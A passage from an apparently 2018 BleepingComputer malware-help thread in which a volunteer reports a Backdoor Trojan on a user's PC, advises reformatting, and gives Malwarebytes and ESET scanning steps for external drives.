Disk: 0 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: 000CBDE6)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=96.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=865 MB) - (Type=27)
Partition 4: (Not Active) - (Size=200.4 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================


#4 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,372 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:11:43 AM

Posted 11 June 2018 - 09:12 PM

Greetings Alex.
 
Unfortunately your computer is infected with a Backdoor Trojan. In addition there is evidence of illegal software on your computer.
 
This is the most highly infected computer I have come across in years. I would advise you to immediately disconnect from the Internet to prohibit others from accessing your personal information.
 
Your computer is compromised to the point that you will have to reformat and reinstall the operating systems and programs. It simply can't be cleaned and even if we tried I would still advise you to never trust it and never have personal information on it.
 
Please let me know if you need assistance in the reformat/reinstall. There is no other option.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"May you be richly rewarded by the Lord, the God of Israel, under whose wings you have come to take refuge."

#5 D3AtH

D3AtH
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  

Posted 12 June 2018 - 07:48 AM

Oh... Then I think I am going to reformat and reinstall the operating system.

Thank you for your help, because of you now I know what to do. And I can manage to reformat and reinstall the operating system.

Thanks again for your assistance, Gary.



#6 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,372 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:11:43 AM

Posted 12 June 2018 - 08:03 AM

You are welcome. I will close the topic shortly but feel free to send me a Personal Message if I can be of assistance.

If you want to save data files (music, pictures, documents, etc.) in order to reintroduce them into your clean computer I would recommend you scan the external device containing the files before ever transferring them back. In anticipation of that let me leave you with these options. Pay particular attention to the external drive portion of each set of instructions.

===================================================

Malwarebytes Anti-Malware Including External Drive Option

----------
  • If Malwarebytes is already installed launch the program, update the database if necessary, attached any external drives you want to scan, and go directly to the Scan instructions below
  • If Malwarebytes is not installed download Malwarebytes Anti-Malware and save it to your desktop
  • Right click the desktop icon and select Run as administrator
  • Click OK for English, then click Next
  • Select I accept the agreement then continue to click Next then finally click Install
  • Uncheck Enable free trial of Malwarebytes Anti-Malware Premium if you do not want the free trial of the paid version, then click Finish
  • If you are notified the Database is out of date click Update Now
  • Hold down the Shift key then attach any external drives you want to scan
  • Click the Scan button near the top
  • Select Custom Scan then click Configure Scan
  • Place a check mark in Scan for rootkits, Scan Startup and Registry Settings, the C: drive, and any additional drives you would like to scan
  • Click Scan now
  • Note: If Malwarebytes will not launch stop and let me know
  • When completed review the Scan Results list and uncheck any items you want to keep (if there are identified items)
  • Click Quarantine threats
  • If requested restart your computer
  • Relaunch Malwarebytes
  • Click the Reports tab
  • Place a check mark in the most recent Scan Report then click View Report
  • Click Export, then select Text File (/txt)
  • Save the file on your Desktop as MBAM.txt
  • Copy and paste the contents of the report in your reply
===================================================

ESET Online Scanner Including External Drive Option

--------------------

I'd like us to scan your machine with ESET OnlineScan This process may take several hours, that is normal.
  • Download esetsmartinstaller_enu.exe and save it to your Desktop
  • Right click on the icon and select Run as administrator
  • Check YES, I accept the Terms of Use
  • Click the Start button
  • Accept any security warnings from your browser
  • Allow the downloading of components
  • Hold down the Shift key then attach any external drives you want to scan
  • Click Advanced settings
  • Check the following items

Enable detection of potentially unwanted applications
Remove found threats
Scan archives
Scan for potentially unsafe applications
Enable Anti-Stealth technology

  • Click Change next to Current scan targets:
  • Place a check mark in any additional drive you wish to scan then click OK
  • Click Start
  • ESET will then download updates and begin scanning your computer
  • If no threats are found simply click Uninstall application on close and hit Finish
  • If threats are found click List of found threats
  • Click Export to text file
  • Save the file on your Desktop as ESET.txt
  • Click Back
  • Click Finish
  • Close the ESET Online Scanner window
  • Copy and paste the contents of ESET.txt in your reply
===================================================

Keeping Your Computer Safe

----------

Please take the time to read below on how to secure the machine and take the necessary steps to keep it clean.

Lawrence Abrams, the founder of BleepingComputer.com, has developed an excellent tutorial which will provide you with the information you need to know to keep your computer secure and clean. Please take the time to read:In addition, here are some more links you might find of interest:Thank you for placing your trust in BleepingComputer. It was a pleasure serving you. ohmy_done.gif
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"May you be richly rewarded by the Lord, the God of Israel, under whose wings you have come to take refuge."

#7 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,372 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:11:43 AM

Posted 12 June 2018 - 08:29 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"May you be richly rewarded by the Lord, the God of Israel, under whose wings you have come to take refuge."




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users